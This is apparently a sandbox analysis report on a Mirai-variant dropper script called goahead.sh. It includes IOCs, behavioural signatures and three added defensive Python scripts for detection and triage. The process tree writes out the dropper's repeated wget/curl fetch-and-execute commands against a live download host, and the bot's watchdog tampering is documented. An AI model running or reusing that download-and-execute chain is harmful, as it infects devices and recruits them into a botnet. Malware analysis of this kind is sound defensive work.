Analysis
- max time kernel: 149s
- max time network: 151s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240418-en
- resource tags: arch:mips, image:debian9-mipsbe-20240418-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 03-11-2024 14:37
Static task
- static1

Behavioral tasks (all run the same sample, goahead.sh)
- behavioral1: ubuntu1804-amd64-20240611-en
- behavioral2: debian9-armhf-20240611-en
- behavioral3: debian9-mipsbe-20240418-en

The signatures, process tree and file events reported on this page are from behavioral3 (the YARA hits below reference behavioral3/files/..., and the analysis header above names the mipsbe resource).
General
- Target: goahead.sh
- Size: 2KB
- MD5: 2f155262711b3b5d224e0c947ff75981
- SHA1: 27318f291143b656c7d945d6f41d90e23d114562
- SHA256: 51e04d56632e0465248dbfdd5145d27c3b9e66c4a38f787c52ddf3a193ec2c91
- SHA512: 92d179867cb380e4948d702d0d9c90d7c6c288e0bb8ac8e97b512f848108e5b97b10fc02c38b5c8b7a57b446d53c1b46710ddd68e0d9ae9854366efd0e8d9d44
Malware Config
- Extracted: family mirai, botnet tag SORA
Signatures
Counts are from the behavioral3 (debian9-mipsbe) run. "TTPs" is the number of mapped MITRE ATT&CK techniques, "IoCs" the number of matching events.

- Mirai family

- Contacts a large (47125) amount of remote hosts (TTPs: 1)
  This may indicate a network scan to discover remotely running services.

- Creates a large amount of network flows (TTPs: 1)
  This may indicate a network scan to discover remotely running services.

- File and Directory Permissions Modification (TTPs: 1, IoCs: 14)
  Adversaries may modify file or directory permissions to evade defenses.
  Process: chmod
  PIDs: 739, 746, 757, 773, 799, 819, 825, 831, 851, 875, 881, 887, 892, 898

- Executes dropped EXE (IoCs: 14)
  IoC: /tmp/robben (process name robben)
  PIDs: 740, 747, 758, 775, 801, 820, 826, 833, 853, 876, 882, 888, 893, 899

- Modifies Watchdog functionality (TTPs: 1, IoCs: 2)
  Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
  description                   ioc                  process
  File opened for modification  /dev/misc/watchdog   robben
  File opened for modification  /dev/watchdog        robben

- YARA rule matches on dropped files (IoCs: 4)
  resource                          yara_rule
  behavioral3/files/fstream-1.dat   upx
  behavioral3/files/fstream-4.dat   upx
  behavioral3/files/fstream-5.dat   upx
  behavioral3/files/fstream-7.dat   upx

- Changes its process name (IoCs: 1)
  description                                                        ioc               pid   process
  Changes the process name, possibly in an attempt to hide itself    chcjp22jmk1be1j   747   robben

- Reads runtime system information (IoCs: 34)
  (Heading restored from the process tree, which tags the curl and robben processes with this signature.)
  description              ioc                             process   occurrences
  File opened for reading  /proc/sys/crypto/fips_enabled   curl      14 (one per curl invocation)
  File opened for reading  /proc/<pid>/exe                 robben    20; pids 424, 665, 669, 671, 672, 687, 702, 707, 709, 710, 713, 719, 748, 751, 797, 798, 862, 879, 882, 890
  The curl reads are a crypto-library FIPS-mode check performed at every curl start, not something the script does. The robben reads walk other processes' executables, including the parent script (713), curl workers (862, 879, 890) and another robben instance (882); this is consistent with a Mirai-style killer module scanning /proc for competing processes.

- System Network Configuration Discovery (TTPs: 1, IoCs: 3)
  Adversaries may gather information about the network configuration of a system.
  pid   process
  745   cat
  742   wget
  744   curl

- Writes file to tmp directory (IoCs: 26)
  Malware often drops required files in the /tmp directory.
  Every entry is "File opened for modification". /tmp/robben is opened by the shell running goahead.sh itself, i.e. the script writes it through output redirection; each sora.* payload is written by curl and, where the wget run succeeded, by wget as well.
  ioc                 written by
  /tmp/robben         goahead.sh
  /tmp/sora.arm4      curl
  /tmp/sora.arm5      wget, curl
  /tmp/sora.arm6      wget, curl
  /tmp/sora.arm7      wget, curl
  /tmp/sora.i468      curl
  /tmp/sora.i686      wget, curl
  /tmp/sora.m68k      wget, curl
  /tmp/sora.mips      wget, curl
  /tmp/sora.mpsl      wget, curl
  /tmp/sora.ppc       wget, curl
  /tmp/sora.ppc440fp  curl
  /tmp/sora.sh4       wget, curl
  /tmp/sora.x86       wget, curl
  /tmp/sora.x86_64    wget, curl
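The two host-side tells in the signature list, a process holding the watchdog device open and a /tmp-resident binary whose visible name no longer matches its executable (robben renamed to chcjp22jmk1be1j), can both be checked from /proc on a live box. The scanner below is an added example, not part of the sandbox report or of the malware; it takes the proc root as a parameter so it can be pointed at a constructed fake tree for testing. The device-node set and scratch-directory list are assumptions, not values taken from the report.

```python
import os
from dataclasses import dataclass, field
from typing import List, Optional

# Device nodes Mirai-family bots open to disarm the hardware watchdog
# (the report shows /dev/watchdog and /dev/misc/watchdog; /dev/watchdog0 is assumed).
WATCHDOG_NODES = {"/dev/watchdog", "/dev/watchdog0", "/dev/misc/watchdog"}
# World-writable scratch locations a dropper like goahead.sh stages into (assumed list).
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass
class Finding:
    pid: int
    exe: str
    comm: str
    reasons: List[str] = field(default_factory=list)


def _read_text(path: str) -> str:
    try:
        with open(path, "rb") as fh:
            return fh.read().decode("utf-8", "replace")
    except OSError:
        return ""


def inspect_pid(proc_root: str, pid: int) -> Optional[Finding]:
    """Return a Finding for one process, or None if it shows neither tell."""
    base = os.path.join(proc_root, str(pid))
    try:
        exe = os.readlink(os.path.join(base, "exe"))
    except OSError:
        return None  # kernel thread, vanished process, or no permission
    comm = _read_text(os.path.join(base, "comm")).strip()
    argv0 = _read_text(os.path.join(base, "cmdline")).split("\0", 1)[0]
    finding = Finding(pid, exe, comm)

    # Tell 1: the watchdog device is held open by this process.
    fd_dir = os.path.join(base, "fd")
    try:
        fds = os.listdir(fd_dir)
    except OSError:
        fds = []
    for fd in fds:
        try:
            target = os.readlink(os.path.join(fd_dir, fd))
        except OSError:
            continue
        if target in WATCHDOG_NODES:
            finding.reasons.append(f"holds {target} open on fd {fd}")

    # Tell 2: the executable lives in scratch space and its visible name was
    # rewritten (Mirai overwrites argv[0] and sets a random comm).
    exe_path = exe.split(" (deleted)", 1)[0]
    exe_name = os.path.basename(exe_path)
    if exe_path.startswith(SCRATCH_DIRS):
        finding.reasons.append(f"runs from scratch dir: {exe_path}")
        if comm and comm != exe_name[:15]:  # the kernel truncates comm to 15 chars
            finding.reasons.append(f"comm {comm!r} != exe name {exe_name!r}")
        if argv0 and os.path.basename(argv0) != exe_name:
            finding.reasons.append(f"argv[0] {argv0!r} != exe name {exe_name!r}")
    return finding if finding.reasons else None


def scan(proc_root: str = "/proc") -> List[Finding]:
    """Inspect every numeric entry under proc_root; results sorted by PID."""
    found = []
    for entry in os.listdir(proc_root):
        if entry.isdigit():
            f = inspect_pid(proc_root, int(entry))
            if f is not None:
                found.append(f)
    return sorted(found, key=lambda f: f.pid)


if __name__ == "__main__":
    for f in scan():
        print(f"pid {f.pid:6d} exe={f.exe} comm={f.comm!r}: " + "; ".join(f.reasons))
```

Run it as root, otherwise /proc/<pid>/exe of other users' processes is unreadable and those PIDs are silently skipped. A bare "runs from scratch dir" hit is weak on its own (any script launched from /tmp triggers it); the combination with a comm/argv[0] mismatch or an open watchdog fd is what matches the behaviour of PID 747 above.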
Processes
All processes below are from the behavioral3 run. PID 713 is the submitted script (tree depth 1); every other process is a direct child of it (depth 2). The script repeats one five-step block per payload name: fetch it with wget and again with curl from http://93.123.85.190/bins/, copy it over robben with cat, chmod +x, then run ./robben goahead.exploit. Two things stand out. The chmod argument list is the sorted content of /tmp at that moment (so the sandbox's own systemd-private-... directory is swept up in it, until it disappears from iteration 10 on), which is consistent with the script running chmod +x *. And only the sora.mips iteration, PID 747, shows the bot's runtime behaviour (watchdog access, process rename, /proc walk), which matches the big-endian MIPS sandbox; the other thirteen robben launches raise nothing beyond "Executes dropped EXE", consistent with execve failing on a binary built for another architecture.

Each entry: PID, executable, command line, then the signatures it triggered (none listed means none).

713  /tmp/goahead.sh   /tmp/goahead.sh
     Writes file to tmp directory

Iteration 1: sora.x86
717  /usr/bin/wget   wget http://93.123.85.190/bins/sora.x86
     Writes file to tmp directory
730  /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.x86
     Reads runtime system information; Writes file to tmp directory
738  /bin/cat        cat sora.x86
739  /bin/chmod      chmod +x goahead.sh robben sora.x86 systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-p01qrj
     File and Directory Permissions Modification
740  /tmp/robben     ./robben goahead.exploit
     Executes dropped EXE

Iteration 2: sora.mips
742  /usr/bin/wget   wget http://93.123.85.190/bins/sora.mips
     System Network Configuration Discovery; Writes file to tmp directory
744  /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.mips
     Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
745  /bin/cat        cat sora.mips
     System Network Configuration Discovery
746  /bin/chmod      chmod +x goahead.sh robben sora.mips sora.x86 systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-p01qrj
     File and Directory Permissions Modification
747  /tmp/robben     ./robben goahead.exploit
     Executes dropped EXE; Modifies Watchdog functionality; Changes its process name; Reads runtime system information

Iteration 3: sora.x86_64
754  /usr/bin/wget   wget http://93.123.85.190/bins/sora.x86_64
     Writes file to tmp directory
755  /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.x86_64
     Reads runtime system information; Writes file to tmp directory
756  /bin/cat        cat sora.x86_64
757  /bin/chmod      chmod +x goahead.sh robben sora.mips sora.x86 sora.x86_64 systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-p01qrj
     File and Directory Permissions Modification
758  /tmp/robben     ./robben goahead.exploit
     Executes dropped EXE

Iteration 4: sora.i468
760  /usr/bin/wget   wget http://93.123.85.190/bins/sora.i468
765  /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.i468
     Reads runtime system information; Writes file to tmp directory
772  /bin/cat        cat sora.i468
773  /bin/chmod      chmod +x goahead.sh robben sora.i468 sora.mips sora.x86 sora.x86_64 systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-p01qrj
     File and Directory Permissions Modification
775  /tmp/robben     ./robben goahead.exploit
     Executes dropped EXE

Iteration 5: sora.i686
777  /usr/bin/wget   wget http://93.123.85.190/bins/sora.i686
     Writes file to tmp directory
788  /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.i686
     Reads runtime system information; Writes file to tmp directory
797  /bin/cat        cat sora.i686
799  /bin/chmod      chmod +x goahead.sh robben sora.i468 sora.i686 sora.mips sora.x86 sora.x86_64 systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-p01qrj
     File and Directory Permissions Modification
801  /tmp/robben     ./robben goahead.exploit
     Executes dropped EXE

Iteration 6: sora.mpsl
803  /usr/bin/wget   wget http://93.123.85.190/bins/sora.mpsl
     Writes file to tmp directory
812  /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.mpsl
     Reads runtime system information; Writes file to tmp directory
818  /bin/cat        cat sora.mpsl
819  /bin/chmod      chmod +x goahead.sh robben sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-p01qrj
     File and Directory Permissions Modification
820  /tmp/robben     ./robben goahead.exploit
     Executes dropped EXE

Iteration 7: sora.arm4
822  /usr/bin/wget   wget http://93.123.85.190/bins/sora.arm4
823  /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.arm4
     Reads runtime system information; Writes file to tmp directory
824  /bin/cat        cat sora.arm4
825  /bin/chmod      chmod +x goahead.sh robben sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-p01qrj
     File and Directory Permissions Modification
826  /tmp/robben     ./robben goahead.exploit
     Executes dropped EXE

Iteration 8: sora.arm5
827  /usr/bin/wget   wget http://93.123.85.190/bins/sora.arm5
     Writes file to tmp directory
828  /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.arm5
     Reads runtime system information; Writes file to tmp directory
829  /bin/cat        cat sora.arm5
831  /bin/chmod      chmod +x goahead.sh robben sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-p01qrj
     File and Directory Permissions Modification
833  /tmp/robben     ./robben goahead.exploit
     Executes dropped EXE

Iteration 9: sora.arm6
835  /usr/bin/wget   wget http://93.123.85.190/bins/sora.arm6
     Writes file to tmp directory
842  /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.arm6
     Reads runtime system information; Writes file to tmp directory
850  /bin/cat        cat sora.arm6
851  /bin/chmod      chmod +x goahead.sh robben sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-p01qrj
     File and Directory Permissions Modification
853  /tmp/robben     ./robben goahead.exploit
     Executes dropped EXE

Iteration 10: sora.arm7
855  /usr/bin/wget   wget http://93.123.85.190/bins/sora.arm7
     Writes file to tmp directory
862  /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.arm7
     Reads runtime system information; Writes file to tmp directory
874  /bin/cat        cat sora.arm7
875  /bin/chmod      chmod +x goahead.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64
     File and Directory Permissions Modification
876  /tmp/robben     ./robben goahead.exploit
     Executes dropped EXE

Iteration 11: sora.ppc
878  /usr/bin/wget   wget http://93.123.85.190/bins/sora.ppc
     Writes file to tmp directory
879  /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.ppc
     Reads runtime system information; Writes file to tmp directory
880  /bin/cat        cat sora.ppc
881  /bin/chmod      chmod +x goahead.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.x86 sora.x86_64
     File and Directory Permissions Modification
882  /tmp/robben     ./robben goahead.exploit
     Executes dropped EXE

Iteration 12: sora.ppc440fp
884  /usr/bin/wget   wget http://93.123.85.190/bins/sora.ppc440fp
885  /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.ppc440fp
     Reads runtime system information; Writes file to tmp directory
886  /bin/cat        cat sora.ppc440fp
887  /bin/chmod      chmod +x goahead.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_64
     File and Directory Permissions Modification
888  /tmp/robben     ./robben goahead.exploit
     Executes dropped EXE

Iteration 13: sora.m68k
889  /usr/bin/wget   wget http://93.123.85.190/bins/sora.m68k
     Writes file to tmp directory
890  /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.m68k
     Reads runtime system information; Writes file to tmp directory
891  /bin/cat        cat sora.m68k
892  /bin/chmod      chmod +x goahead.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_64
     File and Directory Permissions Modification
893  /tmp/robben     ./robben goahead.exploit
     Executes dropped EXE

Iteration 14: sora.sh4
895  /usr/bin/wget   wget http://93.123.85.190/bins/sora.sh4
     Writes file to tmp directory
896  /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.sh4
     Reads runtime system information; Writes file to tmp directory
897  /bin/cat        cat sora.sh4
898  /bin/chmod      chmod +x goahead.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh4 sora.x86 sora.x86_64
     File and Directory Permissions Modification
899  /tmp/robben     ./robben goahead.exploit
     Executes dropped EXE
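The process tree is the clearest artefact on this page: the same fetch / cat / chmod +x / execute chain fourteen times, one per architecture suffix, always against the same host. When triaging a batch of these reports it pays to turn that tree back into structured IOCs and to confirm that each iteration really completed the chain. The script below is an added example (not the sandbox's output and not the dropper's own code); the event list is transcribed from the tree above, reduced to three of the fourteen iterations, and the scratch-directory list used to recognise the execute step is an assumption.

```python
import re
from collections import OrderedDict
from typing import Dict, List, Tuple
from urllib.parse import urlparse

# (pid, executable, command line), transcribed from the process tree above.
# Three of the fourteen iterations are enough to exercise the logic.
EVENTS: List[Tuple[int, str, str]] = [
    (713, "/tmp/goahead.sh", "/tmp/goahead.sh"),
    (717, "/usr/bin/wget", "wget http://93.123.85.190/bins/sora.x86"),
    (730, "/usr/bin/curl", "curl -O http://93.123.85.190/bins/sora.x86"),
    (738, "/bin/cat", "cat sora.x86"),
    (739, "/bin/chmod", "chmod +x goahead.sh robben sora.x86"),
    (740, "/tmp/robben", "./robben goahead.exploit"),
    (742, "/usr/bin/wget", "wget http://93.123.85.190/bins/sora.mips"),
    (744, "/usr/bin/curl", "curl -O http://93.123.85.190/bins/sora.mips"),
    (745, "/bin/cat", "cat sora.mips"),
    (746, "/bin/chmod", "chmod +x goahead.sh robben sora.mips sora.x86"),
    (747, "/tmp/robben", "./robben goahead.exploit"),
    (895, "/usr/bin/wget", "wget http://93.123.85.190/bins/sora.sh4"),
    (896, "/usr/bin/curl", "curl -O http://93.123.85.190/bins/sora.sh4"),
    (897, "/bin/cat", "cat sora.sh4"),
    (898, "/bin/chmod", "chmod +x goahead.sh robben sora.sh4 sora.x86"),
    (899, "/tmp/robben", "./robben goahead.exploit"),
]

URL_RE = re.compile(r"https?://\S+")
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")  # assumed staging locations


def reconstruct(events: List[Tuple[int, str, str]]) -> Dict:
    """Walk events in PID order and bucket them into fetch -> cat -> chmod +x ->
    execute iterations keyed by payload file name. Returns the IOCs plus the
    list of iterations that completed the whole chain."""
    iterations: "OrderedDict[str, dict]" = OrderedDict()
    current = None
    hosts, urls, executed = set(), [], []
    for pid, exe, cmd in sorted(events):
        argv = cmd.split()
        tool = argv[0]
        if tool in ("wget", "curl"):
            url = next((a for a in argv[1:] if URL_RE.fullmatch(a)), None)
            if url is None:
                continue
            parsed = urlparse(url)
            name = parsed.path.rsplit("/", 1)[-1]
            hosts.add(parsed.hostname)
            urls.append(url)
            current = iterations.setdefault(
                name, {"fetch": set(), "cat": False, "chmod": False, "exec": None})
            current["fetch"].add(tool)
        elif tool == "cat" and len(argv) == 2 and argv[1] in iterations:
            iterations[argv[1]]["cat"] = True
        elif tool == "chmod" and "+x" in argv and current is not None:
            current["chmod"] = True
        elif exe.startswith(SCRATCH_DIRS) and current is not None:
            # A binary launched from scratch space after a fetch: the execute step.
            current["exec"] = (pid, exe, tuple(argv[1:]))
            executed.append((pid, exe, tuple(argv[1:])))
    complete = [n for n, s in iterations.items()
                if s["fetch"] and s["cat"] and s["chmod"] and s["exec"]]
    return {
        "download_hosts": sorted(hosts),
        "urls": urls,
        "payload_names": list(iterations),
        "architectures": [n.split(".", 1)[1] for n in iterations if "." in n],
        "complete_iterations": complete,
        "dropper": executed[0][1] if executed else None,
        "exec_args": sorted({args for _, _, args in executed}),
        "exec_count": len(executed),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(reconstruct(EVENTS), indent=2, default=list))
```

The output gives you the blocking list (download host and URLs), the name the payload is executed under, and the argument handed to it (goahead.exploit, the infection-vector tag the loader passes to the bot), and it distinguishes iterations that merely fetched a file from ones that reached execution.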
Network
MITRE ATT&CK Enterprise v15
Downloads
Hashes of the files fetched during the run; the sandbox does not name them here.

- Filesize 28KB
  MD5     fa5457b7546c1b7060c30bde3f8649ca
  SHA1    7c75f6463c36eaebc4719f47d8047e5195a85057
  SHA256  d3f2f30efffec0f49e28199c60b2819a3e831ae0ba920abd2c5ece5e4bfb3adf
  SHA512  f012d61a479015af70447b1c3bd2a48c2977691f9a180f4f5c3340b034c65d69782299cb8459e92e3a18dcadfa3078c8b1c613593170f9fa95dd53ba36050c21

- Filesize 28KB
  MD5     ec332610b0ca5b634c097ed14f42eedc
  SHA1    abcbd111601f4165c400e9db36fbf20339e37170
  SHA256  2bfdc588e26d5f6ac54ca3330ced3ab2bfc9bafb98cdd91fd017180dd5848b3a
  SHA512  f41f54e2aca4a5dfa3d7bcbad45963aa943fa3b6536c34f7c92c7c79894f1009ef5ab13cfed39b74ffc614791b77497689bcbe71edfefecb20497d873c92d1b0

- Filesize 212B
  MD5     83ab6cd9a67528bbc6f4f360cb7f8d83
  SHA1    07e8f17209e0569aab39f062568ff0090d9b20d4
  SHA256  3ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435
  SHA512  171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f

- Filesize 28KB
  MD5     d356657b6ea7a715b60217a914eb6ca8
  SHA1    b276b1a91895c3025e9f9d64227205dac79c8ef6
  SHA256  b0758e5e7fde30404ec43dd5fba21253735464062e8a10f0876193d18194fe22
  SHA512  3b0ab5d1282c9d2ea18ed0fc78aeabafde6c16fa094d53d39a67d3316482da0cffa444dd5dc14aeefb547ce2f789480caa5bb514cb4a26787c7441ba8862e262

- Filesize 64KB
  MD5     fb3d051f41bd7347aeff64980f2d100b
  SHA1    5261ff91b8d99d6b8f5f647e33aad29b90cee973
  SHA256  19f4b46d738fa23ff571db081cea0bf34509b9799de2116853e77691faaebec1
  SHA512  82dd9805571030fc4a56a8d5838f5ee3fe1b162f059c905a48f37abcc4dc58442e1e909ab4a2352d690af8ac306eafe4d89cb87f37baec8a8136d48e884be4dd

- Filesize 27KB
  MD5     00eff503439515d9b12b9c068367cb80
  SHA1    82d68f2b1ffca8558458c1b858599542a67d8bbf
  SHA256  2962b987b00b166299f9a73f7ccb8dc02b4208266465b41f6b1c9c28277d7276
  SHA512  3800bc5a8f3983fc50813c49c906203af6528ff3eb97b4818a8632085562c25eab1c691edb5dcdc96c8d2c3f25784a41897ec8a52c042d391899a310224d50f5
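The dropper fetches fourteen variants of the same bot, named only by target architecture, and the YARA hits earlier on this page mark the dropped files as UPX-packed. Sorting such a pile of downloads without running anything means reading the ELF identification header: class, byte order and e_machine tell you which sora.* name a file corresponds to (sora.mips versus sora.mpsl is big- versus little-endian MIPS) and whether it could have run on the sandbox at all. The parser below is an added example, not code from the report; the sample headers it is tested against are constructed here, not the report's binaries, and the mapping from header facts to the dropper's suffixes is my reading of the names on this page.

```python
import struct
from typing import Dict, List

# e_machine values (from the ELF specification) for the architectures this dropper targets.
EM_NAMES = {3: "x86", 4: "m68k", 8: "mips", 20: "ppc", 40: "arm", 42: "sh", 62: "x86_64"}


def elf_info(data: bytes) -> Dict:
    """Parse e_ident and e_machine from the first 20 bytes; flag the UPX marker.
    Raises ValueError for anything that is not a plausible ELF image."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("invalid ELF class/data encoding")
    order = "<" if ei_data == 1 else ">"          # e_machine is stored in the file's own byte order
    e_type, e_machine = struct.unpack(order + "HH", data[16:20])
    return {
        "bits": 32 if ei_class == 1 else 64,
        "endian": "little" if ei_data == 1 else "big",
        "machine": EM_NAMES.get(e_machine, f"unknown({e_machine})"),
        "type": {2: "EXEC", 3: "DYN"}.get(e_type, f"{e_type}"),
        "upx": b"UPX!" in data,                    # packer marker left by stock UPX
    }


def candidate_payload_names(info: Dict, base: str = "sora") -> List[str]:
    """Map header facts onto the dropper's <base>.<arch> naming (assumed mapping).
    ARM sub-architectures (arm4..arm7) and the x86 flavours are not distinguishable
    from e_ident alone, so every plausible name is returned."""
    machine, big = info["machine"], info["endian"] == "big"
    if machine == "mips":
        return [f"{base}.mips" if big else f"{base}.mpsl"]
    if machine == "arm":
        return [f"{base}.arm{v}" for v in (4, 5, 6, 7)]
    if machine == "x86":
        return [f"{base}.x86", f"{base}.i686", f"{base}.i468"]
    if machine == "x86_64":
        return [f"{base}.x86_64"]
    if machine == "ppc":
        return [f"{base}.ppc", f"{base}.ppc440fp"]
    if machine == "sh":
        return [f"{base}.sh4"]
    if machine == "m68k":
        return [f"{base}.m68k"]
    return []


def make_header(ei_class: int, ei_data: int, e_machine: int, tail: bytes = b"") -> bytes:
    """Constructed test input: a minimal 64-byte ELF header (e_type=EXEC), not a real sample."""
    order = "<" if ei_data == 1 else ">"
    ident = b"\x7fELF" + bytes([ei_class, ei_data, 1, 0]) + b"\0" * 8
    return ident + struct.pack(order + "HH", 2, e_machine) + b"\0" * 44 + tail


if __name__ == "__main__":
    # A constructed big-endian 32-bit MIPS image carrying the UPX marker.
    sample = make_header(1, 2, 8, b"\0" * 64 + b"UPX!" + b"\0" * 8)
    info = elf_info(sample)
    print(info, candidate_payload_names(info))
```

On real samples feed the whole file, not just the header, since the UPX marker sits past the program headers; and treat a missing marker as inconclusive, because modified UPX builds strip it (which is also why the sandbox relies on a YARA rule rather than the string alone).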